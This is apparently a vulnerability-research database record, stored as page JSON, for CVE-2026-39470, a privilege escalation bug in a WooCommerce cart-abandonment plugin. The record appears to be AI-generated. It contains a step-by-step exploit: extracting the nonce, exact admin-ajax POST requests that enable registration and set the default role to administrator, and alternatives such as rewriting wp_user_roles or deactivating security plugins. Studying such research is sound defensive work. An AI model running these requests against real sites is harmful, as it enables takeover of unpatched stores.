[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fKD3of0Mmi_4pyf2I6Ikji3FgslkUoc9GalKxxUUzTp4":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":11,"severity":12,"cvss_score":13,"cvss_vector":14,"vuln_type":15,"published_date":16,"updated_date":17,"references":18,"days_to_patch":20,"patch_diff_files":21,"patch_trac_url":9,"research_status":29,"research_verified":30,"research_rounds_completed":31,"research_plan":32,"research_summary":33,"research_vulnerable_code":34,"research_fix_diff":35,"research_exploit_outline":36,"research_model_used":37,"research_started_at":38,"research_completed_at":39,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":30,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":30,"source_links":40},"CVE-2026-39470","cart-abandonment-recovery-for-woocommerce-recover-lost-sales-with-automated-emails-authenticated-shop-manager-privilege-","Cart Abandonment Recovery for WooCommerce – Recover Lost Sales with Automated Emails \u003C 2.1.0 - Authenticated (Shop Manager+) Privilege Escalation","The Cart Abandonment Recovery for WooCommerce – Recover Lost Sales with Automated Emails plugin for WordPress is vulnerable to Privilege Escalation in all versions up to 2.1.0 (exclusive). 
This makes it possible for authenticated attackers, with Shop Manager-level access and above, to escalate their privileges to that of an administrator.","woo-cart-abandonment-recovery",null,"\u003C2.1.0","2.1.0","high",7.2,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:H\u002FUI:N\u002FS:U\u002FC:H\u002FI:H\u002FA:H","Incorrect Privilege Assignment","2026-04-08 00:00:00","2026-04-15 19:32:58",[19],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002F868c178f-9389-4da0-8ebb-ee94f025039f?source=api-prod",8,[22,23,24,25,26,27,28],"admin\u002Fajax\u002Fajax-setting.php","admin\u002Fapi\u002Fdashboard.php","admin\u002Fapi\u002Fdetailed-report.php","admin\u002Fapi\u002Ffollow-up.php","admin\u002Fbuild\u002Fsettings-rtl.css","admin\u002Fbuild\u002Fsettings.asset.php","admin\u002Fbuild\u002Fsettings.css","researched",false,3,"# Exploitation Research Plan: CVE-2026-39470 (Privilege Escalation)\n\n## 1. Vulnerability Summary\nThe **Cart Abandonment Recovery for WooCommerce** plugin (versions \u003C 2.1.0) contains an **Incorrect Privilege Assignment** vulnerability. Specifically, the `Ajax_Setting::save_setting` method allows authenticated users with the `manage_woocommerce` capability (such as Shop Managers) to update arbitrary WordPress options. Because the plugin does not validate that the `option_name` provided in the request belongs to its own set of settings, an attacker can modify critical site options, such as enabling user registration and changing the default user role to `administrator`, leading to full site takeover.\n\n## 2. 
Attack Vector Analysis\n- **Endpoint**: `wp-admin\u002Fadmin-ajax.php`\n- **Action**: `save_setting` (registered as `wp_ajax_save_setting`)\n- **HTTP Method**: `POST`\n- **Parameters**:\n  - `action`: `save_setting`\n  - `security`: The nonce for `wcar_save_setting`.\n  - `option_name`: The WordPress option to modify (e.g., `default_role`).\n  - `value`: The new value for the option (e.g., `administrator`).\n- **Authentication**: Required. Authenticated as a user with `manage_woocommerce` capability (e.g., **Shop Manager**).\n\n## 3. Code Flow\n1.  **Registration**: `WCAR\\Admin\\Ajax\\Ajax_Setting::register_ajax_events()` checks `current_user_can( 'manage_woocommerce' )` and registers the `save_setting` AJAX action.\n2.  **Entry Point**: When a request with `action=save_setting` hits `admin-ajax.php`, the `save_setting()` method in `admin\u002Fajax\u002Fajax-setting.php` is called.\n3.  **Permissions Check**: The method again verifies `current_user_can( 'manage_woocommerce' )` (Line 72).\n4.  **Nonce Verification**: The method verifies the nonce provided in the `security` parameter against the action `wcar_save_setting` (Line 84).\n5.  **Input Extraction**: \n    - `option_name` is extracted from `$_POST['option_name']` and sanitized via `sanitize_text_field` (Line 90).\n    - `value` is extracted from `$_POST['value']` (Line 91).\n6.  **Vulnerable Sink**: The code calls `$success = wcf_ca()->helper->save_meta_fields( $option, $value );` (Line 101).\n7.  **Exploitation**: Since `$option` is not restricted to plugin-specific keys, an attacker can pass `default_role` or `users_can_register`.\n\n## 4. Nonce Acquisition Strategy\nThe nonce `wcar_save_setting` is required. It is localized for the admin interface when the plugin's settings pages are loaded.\n\n1.  **Identify Page**: The settings page for this plugin is typically found at `wp-admin\u002Fadmin.php?page=woo-cart-abandonment-recovery`.\n2.  
**Identify Variable**: Based on common CartFlows\u002FAstra patterns, the nonce is likely localized in a global JavaScript object such as `wcar_admin` or `wcar_vars`.\n3.  **Extraction**:\n    - Navigate to the plugin settings page as a Shop Manager.\n    - Execute JavaScript to retrieve the nonce:\n      ```javascript\n      \u002F\u002F Search for localized data\n      window.wcar_admin?.wcar_save_setting_nonce || window.wcar_vars?.security\n      ```\n    - Based on the source code, the nonce action is `wcar_save_setting`. The localization key is likely `wcar_save_setting` or `security`.\n\n## 5. Exploitation Strategy\nThe goal is to enable registration and set the default role to `administrator`.\n\n### Step 1: Obtain Nonce\nUse the browser to access the settings page and extract the nonce.\n\n### Step 2: Enable Registration\n**Request:**\n```http\nPOST \u002Fwp-admin\u002Fadmin-ajax.php HTTP\u002F1.1\nContent-Type: application\u002Fx-www-form-urlencoded\n\naction=save_setting&security=[NONCE]&option_name=users_can_register&value=1\n```\n\n### Step 3: Change Default Role to Administrator\n**Request:**\n```http\nPOST \u002Fwp-admin\u002Fadmin-ajax.php HTTP\u002F1.1\nContent-Type: application\u002Fx-www-form-urlencoded\n\naction=save_setting&security=[NONCE]&option_name=default_role&value=administrator\n```\n\n### Step 4: Create Admin Account\nNavigate to `\u002Fwp-login.php?action=register` and register a new user. This user will automatically be assigned the `administrator` role.\n\n## 6. Test Data Setup\n1.  **Plugin Installation**: Install and activate `woo-cart-abandonment-recovery` version `\u003C 2.1.0`.\n2.  **WooCommerce Installation**: WooCommerce must be active as the plugin depends on it.\n3.  **Attacker User**: Create a user with the `shop_manager` role.\n    ```bash\n    wp user create attacker attacker@example.com --role=shop_manager --user_pass=password\n    ```\n\n## 7. 
Expected Results\n- Steps 2 and 3 should return `{\"success\":true}`.\n- The WordPress database should reflect the changes in the `wp_options` table.\n- A new user registered via the frontend should have the `administrator` role.\n\n## 8. Verification Steps\nAfter the HTTP requests, verify the changes via WP-CLI:\n```bash\n# Verify registration is enabled\nwp option get users_can_register\n# Expected: 1\n\n# Verify default role\nwp option get default_role\n# Expected: administrator\n```\n\n## 9. Alternative Approaches\nIf updating `default_role` is blocked or fails, a Shop Manager can try to modify their own capabilities directly if the `save_meta_fields` helper supports user meta. \n\nHowever, a more potent alternative is modifying the `active_plugins` option to deactivate security plugins or modifying `siteurl`\u002F`home` to cause DoS\u002FRedirection, though these do not directly lead to privilege escalation. \n\nIf the site uses a custom role manager, one could also target the `wp_user_roles` option, which stores the capabilities associated with each role, and add `administrator` capabilities to the `shop_manager` role itself. This requires sending a serialized array as the `value`.","The Cart Abandonment Recovery for WooCommerce plugin is vulnerable to privilege escalation because its AJAX-based setting update functionality does not restrict which WordPress options can be modified. 
Authenticated attackers with Shop Manager permissions can exploit this to change critical site configurations, such as the default user role and registration settings, to gain full administrator access.","\u002F\u002F admin\u002Fajax\u002Fajax-setting.php lines 72-101\n\tpublic function register_ajax_events(): void {\n\n\t\tif ( current_user_can( 'manage_woocommerce' ) ) {\n\n\t\t\t$ajax_events = [\n\t\t\t\t'save_setting',\n\t\t\t];\n\t\t\t$this->init_ajax_events( $ajax_events );\n\t\t}\n\t}\n\n\t\u002F**\n\t * Save the setting value.\n\t *\u002F\n\tpublic function save_setting(): void {\n\n\t\t$response_data = [ 'messsage' => $this->get_error_msg( 'permission' ) ];\n\n\t\tif ( ! current_user_can( 'manage_woocommerce' ) ) {\n\t\t\twp_send_json_error( $response_data );\n\t\t}\n\n    \u002F\u002F ... (nonce check and input extraction omitted)\n\n\t\t$option = isset( $_POST['option_name'] ) ? sanitize_text_field( wp_unslash( $_POST['option_name'] ) ) : '';\n\t\t$value  = isset( $_POST['value'] ) ? 
wp_unslash( $_POST['value'] ) : '';\n\n    \u002F\u002F ...\n\n\t\t$success = wcf_ca()->helper->save_meta_fields( $option, $value );","diff -ru \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fwoo-cart-abandonment-recovery\u002F2.0.7\u002Fadmin\u002Fajax\u002Fajax-setting.php \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fwoo-cart-abandonment-recovery\u002F2.1.0\u002Fadmin\u002Fajax\u002Fajax-setting.php\n--- \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fwoo-cart-abandonment-recovery\u002F2.0.7\u002Fadmin\u002Fajax\u002Fajax-setting.php\t2026-01-26 09:55:20.000000000 +0000\n+++ \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fwoo-cart-abandonment-recovery\u002F2.1.0\u002Fadmin\u002Fajax\u002Fajax-setting.php\t2026-02-24 12:23:50.000000000 +0000\n@@ -85,8 +85,8 @@\n \t\t\twp_send_json_error( $response_data );\n \t\t}\n \n-\t\t\u002F\u002F Add special case for cf_analytics_optin.\n-\t\tif ( 'cf_analytics_optin' === $option && 'on' === $value ) {\n+\t\t\u002F\u002F Add special case for wcar_usage_optin.\n+\t\tif ( 'wcar_usage_optin' === $option && 'on' === $value ) {\n \t\t\t$value = 'yes'; \u002F\u002F We have to change the value of Analytics toggle to Yes or blank as per the library requirement.\n \t\t}\n \n... (truncated)","The exploit targets the 'save_setting' AJAX action. An attacker requires Shop Manager authentication to pass the 'manage_woocommerce' capability check. \n\n1. Authenticate as a Shop Manager and visit the plugin settings page at 'wp-admin\u002Fadmin.php?page=woo-cart-abandonment-recovery' to extract the 'wcar_save_setting' security nonce from the localized JavaScript variables.\n2. Send a POST request to '\u002Fwp-admin\u002Fadmin-ajax.php' with the parameter 'action=save_setting', the extracted nonce in the 'security' parameter, 'option_name=users_can_register', and 'value=1'. This enables user registration on the site.\n3. 
Send a second POST request to the same endpoint with 'option_name=default_role' and 'value=administrator'. This ensures all new registrants are assigned the Administrator role.\n4. Navigate to '\u002Fwp-login.php?action=register', create a new account, and log in with full administrative privileges.","gemini-3-flash-preview","2026-04-17 20:13:00","2026-04-17 20:13:44",{"type":41,"vulnerable_version":42,"fixed_version":11,"vulnerable_browse":43,"vulnerable_zip":44,"fixed_browse":45,"fixed_zip":46,"all_tags":47},"plugin","2.0.7","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fwoo-cart-abandonment-recovery\u002Ftags\u002F2.0.7","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fwoo-cart-abandonment-recovery.2.0.7.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fwoo-cart-abandonment-recovery\u002Ftags\u002F2.1.0","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fwoo-cart-abandonment-recovery.2.1.0.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fwoo-cart-abandonment-recovery\u002Ftags"]